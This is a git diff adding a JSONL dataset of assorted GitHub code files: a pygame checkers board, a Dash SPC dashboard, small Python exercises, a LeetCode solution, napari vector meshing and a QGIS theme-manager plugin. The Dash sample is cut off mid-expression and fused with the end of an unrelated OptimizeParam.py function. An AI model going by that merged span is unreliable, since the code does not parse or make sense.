diff --git "a/2994.jsonl" "b/2994.jsonl" new file mode 100644--- /dev/null +++ "b/2994.jsonl" @@ -0,0 +1,435 @@ +{"seq_id":"25886481470","text":"#coding: utf-8\n__author__ = 'thiagowhispher'\n\nimport pygame as pg\n\nclass Board(pg.sprite.Sprite):\n def __init__(self, player_one, player_two):\n pg.sprite.Sprite.__init__(self)\n self.player_one = player_one\n self.player_two = player_two\n\n #Move Hero\n self.playing = False\n self.hero_select = None\n self.coord_hero_select = False\n self.new_coord_hero = False\n\n #Define heros of the two players\n self.heros = pg.sprite.Group()\n self.heros_move = pg.sprite.Group()\n self.heros_capture_required = pg.sprite.Group()\n\n def check_final_game(self):\n enemy = self.player_two.get_heros()\n final_player_one = self.player_one.without_play(self.heros, enemy, 1)\n enemy = self.player_one.get_heros()\n final_player_two = self.player_two.without_play(self.heros, enemy, 2)\n if final_player_one:\n return 2\n if final_player_two:\n return 1\n return 0\n\n def update_all_heros(self):\n self.heros.empty()\n self.heros.add(self.player_one.get_heros())\n self.heros.add(self.player_two.get_heros())\n\n def update_hero(self, pos):\n for hero in self.heros_move:\n if hero.equal_coord(pos):\n self.hero_select.set_coord(pos)\n return True\n return False\n\n def check_capture_required(self, turn):\n if turn == 1:\n enemy = self.player_two.get_heros()\n if self.hero_select == None or self.player_one.get_playing() == 'No play':\n self.heros_capture_required = self.player_one.check_capture_heros(enemy, self.heros)\n else:\n self.heros_capture_required.empty()\n if len(self.hero_select.capture(enemy, self.heros)):\n self.heros_capture_required.add(self.hero_select)\n else:\n enemy = self.player_one.get_heros()\n if self.hero_select == None or self.player_two.get_playing() == 'No play':\n self.heros_capture_required = self.player_two.check_capture_heros(enemy, self.heros)\n else:\n self.heros_capture_required.empty()\n if len(self.hero_select.capture(enemy, self.heros)):\n self.heros_capture_required.add(self.hero_select)\n\n def check_hero(self, hero_select):\n if not len(self.heros_capture_required):\n return True\n else:\n x, y = hero_select.get_coord()\n for hero in self.heros_capture_required:\n if hero.equal_coord([x, y]):\n return True\n return False\n\n def check_flip_turn(self, turn):\n if turn == 1:\n if self.player_one.get_playing() == 'No capture':\n self.player_one.set_playing('No play')\n self.hero_select = None\n turn = self.flip_turn(turn)\n elif self.player_one.get_playing() == 'Capture':\n if not self.player_one.hero_moving():\n self.check_capture_required(turn)\n if not len(self.heros_capture_required):\n self.player_one.set_playing('No play')\n self.hero_select = None\n turn = self.flip_turn(turn)\n else:\n if self.player_two.get_playing() == 'No capture':\n self.player_two.set_playing('No play')\n self.hero_select = None\n turn = self.flip_turn(turn)\n elif self.player_two.get_playing() == 'Capture':\n if not self.player_two.hero_moving():\n self.check_capture_required(turn)\n if not len(self.heros_capture_required):\n self.player_two.set_playing('No play')\n self.hero_select = None\n turn = self.flip_turn(turn)\n return turn\n\n def play(self, pos, turn):\n # Case hero is select\n if self.playing:\n if self.update_hero(pos):\n self.new_coord_hero = self.hero_select.get_coord()\n self.playing = False\n self.heros_move.empty()\n if turn == 1:\n if len(self.heros_capture_required):\n self.player_one.set_playing('Capture')\n self.hero_select.set_moving(True)\n else:\n self.player_one.set_playing('No capture')\n self.hero_select.set_moving(True)\n else:\n if len(self.heros_capture_required):\n self.player_two.set_playing('Capture')\n self.hero_select.set_moving(True)\n else:\n self.player_two.set_playing('No capture')\n self.hero_select.set_moving(True)\n self.heros_capture_required.empty()\n return self.heros_move\n\n if turn == 1:\n hero = self.player_one.search_hero(pos)\n enemy = self.player_two.get_heros()\n else:\n hero = self.player_two.search_hero(pos)\n enemy = self.player_one.get_heros()\n if hero[0]:\n if self.check_hero(hero[1]):\n self.hero_select = hero[1]\n self.playing = True\n self.coord_hero_select = self.hero_select.get_coord()\n self.heros_move = self.hero_select.move(self.heros, enemy, turn)\n else:\n self.playing = False\n self.heros_move.empty()\n else:\n self.playing = False\n self.hero_select = None\n self.heros_move.empty()\n return self.heros_move\n\n def analisy_capture(self, turn, heros_player_one, heros_player_two):\n if turn == 1:\n pg.sprite.groupcollide(heros_player_two, heros_player_one, True, False)\n else:\n pg.sprite.groupcollide(heros_player_one, heros_player_two, True, False)\n\n def flip_turn(self, turn):\n if turn == 1: return 2\n else: return 1\n\n def get_color_hero(self, player):\n if player == 1:\n return self.player_one.get_color_hero()\n else:\n return self.player_two.get_color_hero()\n\n def get_playing(self):\n return self.playing\n\n def get_heros(self):\n return self.heros\n","repo_name":"thiagoyeds/Kenney-Checkers","sub_path":"data/components/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"39"} +{"seq_id":"43467339615","text":"import os\nimport numpy as np\nimport plotly.express as px\nimport dash_bootstrap_components as dbc\nfrom utils import get_history_data\nfrom datetime import datetime, timedelta\nfrom dash import Dash, dcc, html, Input, Output, ctx, dash_table\n\nPAGE_SIZE = 5\ndash_title = \"SPC UI\"\ndf = get_history_data(100,10)\ndebug = False if os.environ[\"DASH_DEBUG_MODE\"] == \"False\" else True\nexternal_stylesheets = [dbc.themes.BOOTSTRAP]\noperators = [['ge ', '>='],\n ['le ', '<='],\n ['lt ', '<'],\n ['gt ', '>'],\n ['ne ', '!='],\n ['eq ', '='],\n ['contains '],\n ['datestartswith ']]\n\napp = Dash(\n __name__, \n title = dash_title, \n suppress_callback_exceptions = True, \n external_stylesheets = external_stylesheets\n )\n\napp.layout = html.Div([\n dbc.Card(\n dbc.CardBody([\n dbc.Row([\n dbc.Col([\n html.H4([\"Date Range\"]), \n dcc.DatePickerRange(\n id='date-picker-range',\n min_date_allowed=df[\"Inserted\"].min().strftime('%Y-%m-%d'), \n max_date_allowed=df[\"Inserted\"].max().strftime('%Y-%m-%d'),\n initial_visible_month=df[\"Inserted\"].min().strftime('%Y-%m-%d'),\n start_date=df[\"Inserted\"].min().strftime('%Y-%m-%d'),\n end_date=df[\"Inserted\"].max().strftime('%Y-%m-%d')\n ), \n ], width=3),\n dbc.Col([\n html.H4([\"Table\"]),\n dcc.Dropdown(id='dropdown-table',\n options=df['Table'].sort_values().unique().tolist(),\n multi=False,\n value=df['Table'].sort_values().unique().tolist()[0],\n placeholder='Select Table...',\n ),\n ], width=3),\n dbc.Col([\n html.Br(),\n dbc.Button('Filter In', id='btn-filter-in', n_clicks=0),\n ], width=1),\n dbc.Col([\n html.Br(),\n dbc.Button('Filter Out', id='btn-filter-out', n_clicks=0),\n ], width=1), \n ], align='center'), \n html.Br(),\n dbc.Row([\n dbc.Col([\n html.H4([\"History Point\"]), \n dcc.Graph(id = \"fig-history\", config={\"displayModeBar\": False})\n ]),\n ], align='center'), \n html.Br(),\n dbc.Row([\n dbc.Col([\n html.H4([\"Selected Point\"]), \n dash_table.DataTable(\n id='table-selected',\n columns=[\n {\"name\": i, \"id\": i} for i in df.columns\n ],\n page_current=0,\n page_size=PAGE_SIZE,\n page_action='custom',\n filter_action='custom',\n filter_query='',\n sort_action='custom',\n sort_mode='multi',\n sort_by=[]\n )\n ]),\n ], align='center'), \n ])\n )\n])\n\ndef calculate_threshold(cdf):\n mean = cdf[cdf['Status']=='used']['Metric'].mean()\n std = cdf[cdf['Status']=='used']['Metric'].std()\n upper_limit = mean + 3 * std\n lower_limit = mean - 3 * std \n return round(upper_limit, 2), round(lower_limit, 2)\n\ndef get_figure(dff, start_date, end_date, table, selectedpoints, selectedpoints_local, x_col=\"Inserted\", y_col=\"Metric\", t_col=\"PID\"):\n df = dff.copy()\n if selectedpoints_local and selectedpoints_local[\"range\"]:\n ranges = selectedpoints_local[\"range\"]\n selection_bounds = {\n \"x0\": ranges[\"x\"][0],\n \"x1\": ranges[\"x\"][1],\n \"y0\": ranges[\"y\"][0],\n \"y1\": ranges[\"y\"][1],\n }\n else:\n selection_bounds = {\n \"x0\": np.min(df[x_col]),\n \"x1\": np.max(df[x_col]),\n \"y0\": np.min(df[y_col]),\n \"y1\": np.max(df[y_col]),\n }\n df = df[(df['Table']==table)\n &(df['Inserted']>=datetime.strptime(start_date, '%Y-%m-%d'))\n &(df['Inserted'] 0:\n break\n Bintial += 200\n return Bintial\n","repo_name":"zhanqiyan/FiniteBlockLength","sub_path":"OptimizeParam.py","file_name":"OptimizeParam.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30531810343","text":"numero = int(input('Informe um número: '))\ncount = 0\n\nfor i in range(2, numero):\n if numero%i == 0:\n count += 1\n \nif count == 0:\n print('Primo!')\nelse:\n print('Não é primo!')","repo_name":"ifpb-cz-ads/pw1-2021-2-ac-s6-team_klinsman_joseane","sub_path":"questao_16.py","file_name":"questao_16.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"13908532854","text":"deck_list = input().split(\" \")\r\ncount = int(input())\r\nsublist1 = []\r\nsublist2 = []\r\ntemporary_list = []\r\n\r\nfor i in range(count):\r\n for i in range(int(len(deck_list)/2)):\r\n sublist1.append(deck_list[i])\r\n for i in range(int(len(deck_list)/2), len(deck_list)):\r\n sublist2.append(deck_list[i])\r\n for i in range(len(sublist1)):\r\n temporary_list.append(sublist1[i])\r\n temporary_list.append(sublist2[i])\r\n deck_list = temporary_list.copy()\r\n temporary_list=[]\r\n sublist1 = []\r\n sublist2 = []\r\n\r\nprint(deck_list)\r\n","repo_name":"IvelinnaPancheva/SoftUni-Courses","sub_path":"programming_fundamentals/03-Lists-Basics-Exercise/faro_shuffle.py","file_name":"faro_shuffle.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37883217039","text":"# -*- coding: utf-8 -*-\n# author: caoji\n# datetime: 2023-02-08 22:57 \n# ide: PyCharm\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def sumNumbers(self, root: TreeNode) -> int:\n self.ans = 0\n\n def dfs(node, pre):\n if not node.left and not node.right:\n self.ans += pre * 10 + node.val\n return\n if node.left:\n dfs(node.left, pre * 10 + node.val)\n if node.right:\n dfs(node.right, pre * 10 + node.val)\n dfs(root, 0)\n return self.ans\n# leetcode submit region end(Prohibit modification and deletion)\n\n","repo_name":"aa694849243/leetcode_cj","sub_path":"剑指 Offer II 049. 从根节点到叶节点的路径数字之和.py","file_name":"剑指 Offer II 049. 从根节点到叶节点的路径数字之和.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37486191868","text":"import numpy as np\n\nfrom napari._vispy.layers.base import VispyBaseLayer\nfrom napari._vispy.visuals.vectors import VectorsVisual\nfrom napari.layers.utils.layer_utils import segment_normal\n\n\nclass VispyVectorsLayer(VispyBaseLayer):\n def __init__(self, layer) -> None:\n node = VectorsVisual()\n super().__init__(layer, node)\n\n self.layer.events.edge_color.connect(self._on_data_change)\n\n self.reset()\n self._on_data_change()\n\n def _on_data_change(self):\n # Make meshes\n vertices, faces = generate_vector_meshes(\n self.layer._view_data,\n self.layer.edge_width,\n self.layer.length,\n self.layer.vector_style,\n )\n face_color = self.layer._view_face_color\n ndisplay = self.layer._slice_input.ndisplay\n ndim = self.layer.ndim\n\n if len(vertices) == 0 or len(faces) == 0:\n vertices = np.zeros((3, ndisplay))\n faces = np.array([[0, 1, 2]])\n face_color = np.array([[0, 0, 0, 0]])\n else:\n vertices = vertices[:, ::-1]\n\n if ndisplay == 3 and ndim == 2:\n vertices = np.pad(vertices, ((0, 0), (0, 1)), mode='constant')\n\n self.node.set_data(\n vertices=vertices,\n faces=faces,\n face_colors=face_color,\n )\n\n self.node.update()\n # Call to update order of translation values with new dims:\n self._on_matrix_change()\n\n\ndef generate_vector_meshes(vectors, width, length, vector_style):\n \"\"\"Generates list of mesh vertices and triangles from a list of vectors\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n vector_style : VectorStyle\n display style of the vectors\n\n Returns\n -------\n vertices : (aN, 2) array for 2D and (2aN, 2) array for 3D, with a=4, 3, or 7 for vector_style='line', 'triangle', or 'arrow' respectively\n Vertices of all triangles\n triangles : (bN, 3) array for 2D or (2bN, 3) array for 3D, with b=2, 1, or 3 for vector_style='line', 'triangle', or 'arrow' respectively\n Vertex indices that form the mesh triangles\n \"\"\"\n ndim = vectors.shape[2]\n if ndim == 2:\n vertices, triangles = generate_vector_meshes_2D(\n vectors, width, length, vector_style\n )\n else:\n v_a, t_a = generate_vector_meshes_2D(\n vectors, width, length, vector_style, p=(0, 0, 1)\n )\n v_b, t_b = generate_vector_meshes_2D(\n vectors, width, length, vector_style, p=(1, 0, 0)\n )\n vertices = np.concatenate([v_a, v_b], axis=0)\n triangles = np.concatenate([t_a, len(v_a) + t_b], axis=0)\n\n return vertices, triangles\n\n\ndef generate_vector_meshes_2D(\n vectors, width, length, vector_style, p=(0, 0, 1)\n):\n \"\"\"Generates list of mesh vertices and triangles from a list of vectors\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n vector_style : VectorStyle\n display style of the vectors\n p : 3-tuple, optional\n orthogonal vector for segment calculation in 3D.\n\n Returns\n -------\n vertices : (aN, 2) array for 2D, with a=4, 3, or 7 for vector_style='line', 'triangle', or 'arrow' respectively\n Vertices of all triangles\n triangles : (bN, 3) array for 2D, with b=2, 1, or 3 for vector_style='line', 'triangle', or 'arrow' respectively\n Vertex indices that form the mesh triangles\n \"\"\"\n\n if vector_style == 'line':\n vertices, triangles = generate_meshes_line_2D(\n vectors, width, length, p\n )\n\n elif vector_style == 'triangle':\n vertices, triangles = generate_meshes_triangle_2D(\n vectors, width, length, p\n )\n\n elif vector_style == 'arrow':\n vertices, triangles = generate_meshes_arrow_2D(\n vectors, width, length, p\n )\n\n return vertices, triangles\n\n\ndef generate_meshes_line_2D(vectors, width, length, p):\n \"\"\"Generates list of mesh vertices and triangles from a list of vectors.\n\n Vectors are composed of 4 vertices and 2 triangles.\n Vertices are generated according to the following scheme::\n\n 1---x---0\n | . |\n | . |\n | . |\n 3---v---2\n\n Where x marks the start point of the vector, and v its end point.\n\n In the case of k 2D vectors, the output 'triangles' is:\n [\n [0,1,2], # vector 0, triangle i=0\n [1,2,3], # vector 0, triangle i=1\n [4,5,6], # vector 1, triangle i=2\n [5,6,7], # vector 1, triangle i=3\n\n ...,\n\n [2i, 2i + 1, 2i + 2], # vector k-1, triangle i=2k-2 (i%2=0)\n [2i - 1, 2i, 2i + 1] # vector k-1, triangle i=2k-1 (i%2=1)\n ]\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n p : 3-tuple\n orthogonal vector for segment calculation in 3D.\n\n Returns\n -------\n vertices : (4N, D) array\n Vertices of all triangles\n triangles : (2N, 3) array\n Vertex indices that form the mesh triangles\n \"\"\"\n nvectors, _, ndim = vectors.shape\n\n vectors_starts = vectors[:, 0]\n vectors_ends = vectors_starts + length * vectors[:, 1]\n\n vertices = np.zeros((4 * nvectors, ndim))\n offsets = segment_normal(vectors_starts, vectors_ends, p=p)\n offsets = np.repeat(offsets, 4, axis=0)\n\n signs = np.ones((len(offsets), ndim))\n signs[::2] = -1\n offsets = offsets * signs\n\n vertices[::4] = vectors_starts\n vertices[1::4] = vectors_starts\n vertices[2::4] = vectors_ends\n vertices[3::4] = vectors_ends\n\n vertices = vertices + width * offsets / 2\n\n # Generate triangles in two steps:\n # 1. Repeat the vertices pattern\n # [[0,1,2],\n # [1,2,3]]\n # as described in the docstring\n vertices_pattern = np.tile([[0, 1, 2], [1, 2, 3]], (nvectors, 1))\n # 2. Add an offset to differentiate between vectors\n triangles = (\n vertices_pattern + np.repeat(4 * np.arange(nvectors), 2)[:, np.newaxis]\n )\n\n triangles = triangles.astype(np.uint32)\n\n return vertices, triangles\n\n\ndef generate_meshes_triangle_2D(vectors, width, length, p):\n \"\"\"Generate meshes forming 2D isosceles triangles to represent input vectors.\n\n Vectors are composed of 3 vertices and 1 triangles.\n Vertices are generated according to the following scheme::\n\n 1---x---0\n . .\n . .\n . .\n 2\n\n\n Where x marks the start point of the vector, and the vertex 2 its end\n point.\n\n In the case of k 2D vectors, the output 'triangles' is:\n [\n [0,1,2], # vector 0, triangle i=0\n [3,4,5], # vector 1, triangle i=1\n\n ...,\n\n [3i, 3i + 1, 3i + 2] # vector k-1, triangle i=k-1\n ]\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n p : 3-tuple\n orthogonal vector for segment calculation in 3D.\n\n Returns\n -------\n vertices : (3N, D) array\n Vertices of all triangles\n triangles : (N, 3) array\n Vertex indices that form the mesh triangles\n \"\"\"\n nvectors, _, ndim = vectors.shape\n\n vectors_starts = vectors[:, 0]\n vectors_ends = vectors_starts + length * vectors[:, 1]\n\n vertices = np.zeros((3 * nvectors, ndim))\n offsets = segment_normal(vectors_starts, vectors_ends, p=p)\n offsets = np.repeat(offsets, 3, axis=0)\n\n signs = np.ones((len(offsets), ndim))\n signs[::3] = -1\n multipliers = np.ones((len(offsets), ndim))\n multipliers[2::3] = 0\n\n # here 'multipliers' is used to prevent vertex 2 from being offset\n offsets = offsets * signs * multipliers\n\n vertices[::3] = vectors_starts\n vertices[1::3] = vectors_starts\n vertices[2::3] = vectors_ends\n\n vertices = vertices + width * offsets / 2\n\n # faster than using the formula in the docstring\n triangles = np.arange(3 * nvectors, dtype=np.uint32).reshape((-1, 3))\n\n return vertices, triangles\n\n\ndef generate_meshes_arrow_2D(vectors, width, length, p):\n \"\"\"Generate mesh forming 2D arrows given input vectors.\n\n Vectors are composed of 7 vertices and 3 triangles.\n Vertices are generated according to the following scheme::\n\n 1---x---0\n | . |\n | . |\n | . |\n 5---3-------2---4\n . .\n . .\n 6\n\n Where x marks the start point of the vector, and the vertex 6 its end\n point.\n\n In the case of k 2D vectors, the output 'triangles' is:\n [\n [0,1,2], # vector 0, triangle i=0\n [1,2,3], # vector 0, triangle i=1\n [4,5,6], # vector 0, triangle i=2\n [7,8,9], # vector 1, triangle i=3\n [8,9,10], # vector 1, triangle i=4\n [11,12,13], # vector 1, triangle i=5\n\n ...,\n\n [7i/3, 7i/3 + 1, 7i/3 + 2],\n # vector k-1, triangle i=3k-3 (i%3=0)\n [7(i - 1)/3 + 1, 7(i - 1)/3 + 2, 7(i - 1)/3 + 3],\n # vector k-1, triangle i=3k-2 (i%3=1)\n [7(i - 2)/3 + 4, 7(i - 2)/3 + 5, 7(i - 2)/3 + 6]\n # vector k-1, triangle i=3k-1 (i%3=2)\n ]\n\n Parameters\n ----------\n vectors : (N, 2, D) array\n A list of N vectors with start point and projections of the vector\n in D dimensions, where D is 2 or 3.\n width : float\n width of the vectors' bases\n length : float\n length multiplier of the line to be drawn\n p : 3-tuple\n orthogonal vector for segment calculation in 3D.\n\n Returns\n -------\n vertices : (7N, D) array\n Vertices of all triangles\n triangles : (3N, 3) array\n Vertex indices that form the mesh triangles\n \"\"\"\n nvectors, _, ndim = vectors.shape\n\n vectors_starts = vectors[:, 0]\n\n # Will be used to generate the vertices 2,3,4 and 5.\n # Right now the head of the arrow is put at 75% of the length\n # of the vector.\n vectors_intermediates = vectors_starts + 0.75 * length * vectors[:, 1]\n\n vectors_ends = vectors_starts + length * vectors[:, 1]\n\n vertices = np.zeros((7 * nvectors, ndim))\n offsets = segment_normal(vectors_starts, vectors_ends, p=p)\n offsets = np.repeat(offsets, 7, axis=0)\n\n signs = np.ones((len(offsets), ndim))\n signs[::2] = -1\n multipliers = np.ones((len(offsets), ndim))\n multipliers[4::7] = 2\n multipliers[5::7] = 2\n multipliers[6::7] = 0\n\n # here 'multipliers' is used to prevent vertex 6 from being offset,\n # and to offset vertices 4 and 5 twice as much as vertices 2 and 3\n offsets = offsets * signs * multipliers\n\n vertices[::7] = vectors_starts\n vertices[1::7] = vectors_starts\n vertices[2::7] = vectors_intermediates\n vertices[3::7] = vectors_intermediates\n vertices[4::7] = vectors_intermediates\n vertices[5::7] = vectors_intermediates\n vertices[6::7] = vectors_ends\n\n vertices = vertices + width * offsets / 2\n\n # Generate triangles in two steps:\n # 1. Repeat the vertices pattern\n # [[0,1,2],\n # [1,2,3]\n # [4,5,6]]\n # as described in the docstring\n vertices_pattern = np.tile(\n [[0, 1, 2], [1, 2, 3], [4, 5, 6]], (nvectors, 1)\n )\n # 2. Add an offset to differentiate between vectors\n triangles = (\n vertices_pattern + np.repeat(7 * np.arange(nvectors), 3)[:, np.newaxis]\n )\n\n triangles = triangles.astype(np.uint32)\n\n return vertices, triangles\n","repo_name":"napari/napari","sub_path":"napari/_vispy/layers/vectors.py","file_name":"vectors.py","file_ext":"py","file_size_in_byte":12444,"program_lang":"python","lang":"en","doc_type":"code","stars":1800,"dataset":"github-code","pt":"39"} +{"seq_id":"74034468915","text":"import os\nimport json\nimport subprocess\nimport webbrowser\nimport requests\nfrom qgis.PyQt import uic\nfrom qgis.PyQt.QtWidgets import *\nfrom qgis.PyQt.QtCore import *\nfrom qgis.PyQt.QtGui import *\n\nfrom qgis.core import *\n\nfrom .theme_settings_dialog import ThemeSettingsDialog\n\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'ui/themes_manager.ui'))\n\n\nclass ThemeManagerDockWidget(QDockWidget, FORM_CLASS):\n\n def __init__(self, iface, parent=None):\n super(ThemeManagerDockWidget, self).__init__(parent)\n\n self.setupUi(self)\n self.settings = QSettings()\n self.iface = iface\n\n self.buttonBox.button(QDialogButtonBox.Retry).setText(\"Refresh\")\n\n QgsProject.instance().readProject.connect(self.enable_publish_button)\n self.themes_listWidget.itemClicked.connect(self.enable_buttons)\n self.qwc2Dir_button.clicked.connect(\n lambda: self.open_file_browser(self.qwc2Dir_lineEdit))\n self.qwc2Dir_lineEdit.textChanged.connect(\n lambda: self.check_path(self.qwc2Dir_lineEdit,\n self.error_lbl_qwc2))\n self.projectsDir_button.clicked.connect(\n lambda: self.open_file_browser(self.projectsDir_lineEdit))\n self.projectsDir_lineEdit.textChanged.connect(\n lambda: self.check_path(self.projectsDir_lineEdit,\n self.error_lbl_server))\n self.qwc2Url_lineEdit.editingFinished.connect(self.enable_qwc2_button)\n self.qwc2Url_lineEdit.textChanged.connect(\n lambda: self.check_path(self.qwc2Url_lineEdit,\n self.error_lbl_url, url=True))\n self.buttonBox.button(QDialogButtonBox.Save).clicked.connect(\n self.save_themes_config)\n self.buttonBox.button(QDialogButtonBox.Save).clicked.connect(\n self.save_paths)\n self.buttonBox.button(QDialogButtonBox.Retry).clicked.connect(\n self.load_themes_config)\n self.defaultScales_lineEdit.textChanged.connect(\n lambda: self.check_numbers(self.defaultScales_lineEdit))\n self.defaultPrintScales_lineEdit.textChanged.connect(\n lambda: self.check_numbers(self.defaultPrintScales_lineEdit))\n self.defaultPrintResolutions_lineEdit.textChanged.connect(\n lambda: self.check_numbers(self.defaultPrintResolutions_lineEdit))\n self.addTheme_button.clicked.connect(\n lambda: self.create_or_edit_theme(\"create\"))\n self.editTheme_button.clicked.connect(\n lambda: self.create_or_edit_theme(\"edit\"))\n self.deleteTheme_button.clicked.connect(self.delete_theme)\n self.openProject_button.clicked.connect(self.open_project)\n self.showQWC2_button.clicked.connect(self.open_qwc2)\n\n self.error_lbl_qwc2.setVisible(False)\n self.error_lbl_server.setVisible(False)\n self.error_lbl_url.setVisible(False)\n\n self.set_qwc2_dir_path(self.settings.value(\n \"qwc2-themes-manager/qwc2_directory\"))\n self.set_projects_dir_path(self.settings.value(\n \"qwc2-themes-manager/project_directory\"))\n self.set_qwc2_url(self.settings.value(\"qwc2-themes-manager/qwc2_url\"))\n self.tabWidget.currentChanged.connect(self.save_paths)\n\n self.qwc2Dir_button.setIcon(QIcon(\n \":/images/themes/default/mActionFileOpen.svg\"))\n self.projectsDir_button.setIcon(QIcon(\n \":/images/themes/default/mActionFileOpen.svg\"))\n\n self.activate_themes_tab()\n\n def set_qwc2_dir_path(self, path):\n self.qwc2Dir_lineEdit.setText(path)\n\n def set_projects_dir_path(self, path):\n self.projectsDir_lineEdit.setText(path)\n\n def set_qwc2_url(self, url):\n self.qwc2Url_lineEdit.setText(url)\n\n def open_file_browser(self, lineEdit):\n path = QFileDialog.getExistingDirectory(\n self, \"Select a directory\",\n options=QFileDialog.ShowDirsOnly)\n if path:\n lineEdit.setText(path)\n\n def check_path(self, lineEdit, label, url=False):\n if url is True:\n url = lineEdit.text()\n if not url.startswith(\"http\"):\n url = \"http://\" + url\n try:\n requests.get(url)\n label.setVisible(False)\n lineEdit.setStyleSheet(\"background: #FFFFFF; color: #000000;\")\n except:\n label.setVisible(True)\n label.setText(\"This url does not exist\")\n lineEdit.setStyleSheet(\"background: #FF7777; color: #FFFFFF;\")\n else:\n perm_ok, msg = self.check_permissions(lineEdit.text().strip())\n if perm_ok:\n label.setVisible(False)\n lineEdit.setStyleSheet(\"background: #FFFFFF; color: #000000;\")\n else:\n label.setVisible(True)\n label.setText(msg)\n lineEdit.setStyleSheet(\"background: #FF7777; color: #FFFFFF;\")\n\n self.activate_themes_tab()\n\n def save_paths(self):\n self.settings.setValue(\"qwc2-themes-manager/qwc2_directory\",\n self.qwc2Dir_lineEdit.text())\n self.settings.setValue(\"qwc2-themes-manager/project_directory\",\n self.projectsDir_lineEdit.text())\n self.settings.setValue(\"qwc2-themes-manager/qwc2_url\",\n self.qwc2Url_lineEdit.text())\n self.load_themes_config()\n\n def activate_themes_tab(self):\n style = \"background: #FFFFFF; color: #000000;\"\n if self.qwc2Dir_lineEdit.styleSheet() == style and \\\n self.projectsDir_lineEdit.styleSheet() == style \\\n and self.qwc2Url_lineEdit.styleSheet() == style:\n self.tabWidget.setTabEnabled(0, True)\n else:\n self.tabWidget.setTabEnabled(0, False)\n\n def deactivate_themes_tab(self):\n for child in self.themes_tab.children():\n if isinstance(child, QGridLayout):\n continue\n child.setEnabled(False)\n self.defaultScales_lineEdit.setText(\"\")\n self.buttonBox.setEnabled(True)\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(False)\n\n def load_themes_config(self):\n themes_dict = self.check_config()\n if themes_dict is None:\n return\n for child in self.themes_tab.children():\n child.setEnabled(True)\n self.buttonBox.button(QDialogButtonBox.Save).setEnabled(True)\n self.reset_ui()\n\n if \"defaultScales\" in themes_dict:\n self.defaultScales_lineEdit.setText(\n \",\".join(str(num) for num in themes_dict[\"defaultScales\"]))\n\n if \"defaultPrintScales\" in themes_dict:\n self.defaultPrintScales_lineEdit.setText(\n \",\".join(\n str(num) for num in themes_dict[\"defaultPrintScales\"]))\n\n if \"defaultPrintResolutions\" in themes_dict:\n self.defaultPrintResolutions_lineEdit.setText(\n \",\".join(str(num) for num in themes_dict[\n \"defaultPrintResolutions\"]))\n\n if \"themes\" in themes_dict.keys() and \"items\" in themes_dict[\n \"themes\"].keys():\n self.fill_listView(themes_dict[\"themes\"][\"items\"])\n for theme in themes_dict[\"themes\"][\"items\"]:\n if \"default\" in theme.keys():\n if \"title\" in theme.keys():\n self.defaultTheme_comboBox.setCurrentText(\n theme[\"title\"])\n break\n elif \"url\" in theme.keys():\n title = os.path.basename(theme[\"url\"])\n self.defaultTheme_comboBox.setCurrentText(title)\n break\n\n def check_config(self):\n path = os.path.join(self.qwc2Dir_lineEdit.text(), \"themesConfig.json\")\n themes_config = self.read_themes_config(path)\n themes_dict = None\n if not themes_config:\n return\n\n try:\n themes_dict = json.load(themes_config)\n except Exception:\n QgsMessageLog.logMessage(\n \"Corrupt JSON file: The JSON module couldn't read the \"\n \"themesConfig.json file.\",\n \"QWC2 Theme Manager\", Qgis.Critical)\n res = QMessageBox.question(\n None, \"QWC2 Theme Manager\",\n \"It seems that your themesConfig.json file is corrupt.\\n\"\n \"Would you like to create a new themesConfig.json file\"\n \" and override the existing one?\")\n if res == QMessageBox.No:\n self.deactivate_themes_tab()\n return\n else:\n themes_config = self.create_new_themes_config(path)\n if themes_config:\n themes_dict = json.load(themes_config)\n\n themes_config.close()\n return themes_dict\n\n def read_themes_config(self, path):\n try:\n themes_config = open(path, \"r\", encoding=\"utf-8\")\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot open themes configuration file\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot open file: %s.\" % path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n self.deactivate_themes_tab()\n return None\n except FileNotFoundError:\n return self.create_new_themes_config(path)\n\n return themes_config\n\n def create_new_themes_config(self, path):\n try:\n themes_dict = open(path, 'w')\n themes_dict.write(\"{}\")\n except PermissionError:\n QMessageBox.critical(\n None, \"QWC2 Theme Manager: Permission Error\",\n \"Cannot create new themes configuration file.\"\n \"\\nInsufficient permissions!\")\n QgsMessageLog.logMessage(\n \"Permission Error: Cannot override file: %s.\" % path,\n \"QWC2 Theme Manager\", Qgis.Critical)\n return\n except FileNotFoundError:\n QgsMessageLog.logMessage(\n \"The Path: %s was not found.\" % path,\n \"QWC2 Theme Manager\", Qgis.Info)\n return\n 